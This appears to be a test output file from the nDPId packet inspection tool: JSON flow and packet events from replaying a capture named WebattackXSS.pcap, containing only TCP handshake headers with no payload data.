+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3492,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1499347386736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347386736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA85qBAAD4G3y+sEAABwKgKMt1EAFDnQGeHAAAAAKACchCwRQAAAgQFtAQCCAoBOoEnAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3493,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1499347386736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347386736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3URBkoPY50BniKAScSCVOAAAAgQFtAQCCAoD5FKdATqBJwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3494,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1499347386737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347386737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA05qFAAD4G3zasEAABwKgKMt1EAFDnQGeIQZKD2YAQAOU0PwAAAQEICgE6gSgD5FKd"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347389305,"flow_last_seen":1499347389305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347389305,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1499347389305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347389305,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86AFAAD4G3c6sEAABwKgKMt1eAFBbbmurAAAAAKACchA1VwAAAgQFtAQCCAoBOoOqAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":1499347389305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347389305,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3V4nyHcOW25rrKAScSA+XAAAAgQFtAQCCAoD5FUfATqDqgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":1499347389306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347389306,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06AJAAD4G3dWsEAABwKgKMt1eAFBbbmusJ8h3D4AQAOXdYwAAAQEICgE6g6oD5FUf"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347390580,"flow_last_seen":1499347390580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347390580,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1499347390580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347390580,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jW9AAD4GOGGsEAABwKgKMt1sAFC4TAmHAAAAAKACchA5UQAAAgQFtAQCCAoBOoToAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1499347390580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347390580,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Wzc2WIguEwJiKAScSCg8wAAAgQFtAQCCAoD5FZeATqE6AEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":1499347390581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347390581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jXBAAD4GOGisEAABwKgKMt1sAFC4TAmI3NliIYAQAOU\/+gAAAQEICgE6hOkD5FZe"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347393135,"flow_last_seen":1499347393135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347393135,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1499347393135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347393135,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89hRAAD4Gz7usEAABwKgKMt2GAFBIK3FzAAAAAKACchA+7QAAAgQFtAQCCAoBOodnAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":1499347393135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347393135,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Yb1ZkzcSCtxdKAScSCgxwAAAgQFtAQCCAoD5FjdATqHZwEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":1499347393136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347393136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09hVAAD4Gz8KsEAABwKgKMt2GAFBIK3F09WZM3YAQAOU\/zwAAAQEICgE6h2cD5Fjd"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347394398,"flow_last_seen":1499347394398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394398,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1499347394398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347394398,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eldAAD4GS3msEAABwKgKMt2UAFCjvfL0AAAAAKACchBgjwAAAgQFtAQCCAoBOoijAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1499347394398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347394398,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ZQ04Dogo73y9aAScSCUcAAAAgQFtAQCCAoD5FoZATqIowEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1499347394399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347394399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0elhAAD4GS4CsEAABwKgKMt2UAFCjvfL1NOA6IYAQAOUzeAAAAQEICgE6iKMD5FoZ"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347259759,"flow_last_seen":1499347265691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347259759,"flow_last_seen":1499347265691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347262289,"flow_last_seen":1499347267691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347262289,"flow_last_seen":1499347267691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347263542,"flow_last_seen":1499347268692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347263542,"flow_last_seen":1499347268692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347264804,"flow_last_seen":1499347270693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347264804,"flow_last_seen":1499347270693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347266097,"flow_last_seen":1499347271692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347266097,"flow_last_seen":1499347271692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347267376,"flow_last_seen":1499347272693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347267376,"flow_last_seen":1499347272693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347268659,"flow_last_seen":1499347273693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347268659,"flow_last_seen":1499347273693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347395736,"flow_last_seen":1499347395736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347395736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1499347395736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347395736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86QJAAD4G3M2sEAABwKgKMt2iAFAP0mDzAAAAAKACchCFIAAAAgQFtAQCCAoBOonxAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":1499347395736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347395736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3aKdN8ZwD9Jg9KAScSDDCwAAAgQFtAQCCAoD5FtnATqJ8QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":1499347395737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347395737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06QNAAD4G3NSsEAABwKgKMt2iAFAP0mD0nTfGcYAQAOViEgAAAQEICgE6ifID5Ftn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3582,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347398258,"flow_last_seen":1499347398258,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347398258,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3582,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1499347398258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347398258,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8RfFAAD4Gf9+sEAABwKgKMt28AFBXE8mZAAAAAKACchDSpwAAAgQFtAQCCAoBOoxoAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1499347398258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347398258,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3byK2p7LVxPJmqAScSBIHgAAAgQFtAQCCAoD5F3eATqMaAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":3,"flow_last_seen":1499347398259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347398259,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0RfJAAD4Gf+asEAABwKgKMt28AFBXE8maitqezIAQAOXnJQAAAQEICgE6jGgD5F3e"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347399514,"flow_last_seen":1499347399514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347399514,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1499347399514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347399514,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gr5AAD4GQxKsEAABwKgKMt3KAFDFpQ8cAAAAAKACchAdSwAAAgQFtAQCCAoBOo2iAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3596,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":1499347399514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347399514,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3cp+0BfYxaUPHaAScSAkhQAAAgQFtAQCCAoD5F8YATqNogEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":1499347399515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347399515,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gr9AAD4GQxmsEAABwKgKMt3KAFDFpQ8dftAX2YAQAOXDjAAAAQEICgE6jaID5F8Y"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347400752,"flow_last_seen":1499347400752,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347400752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 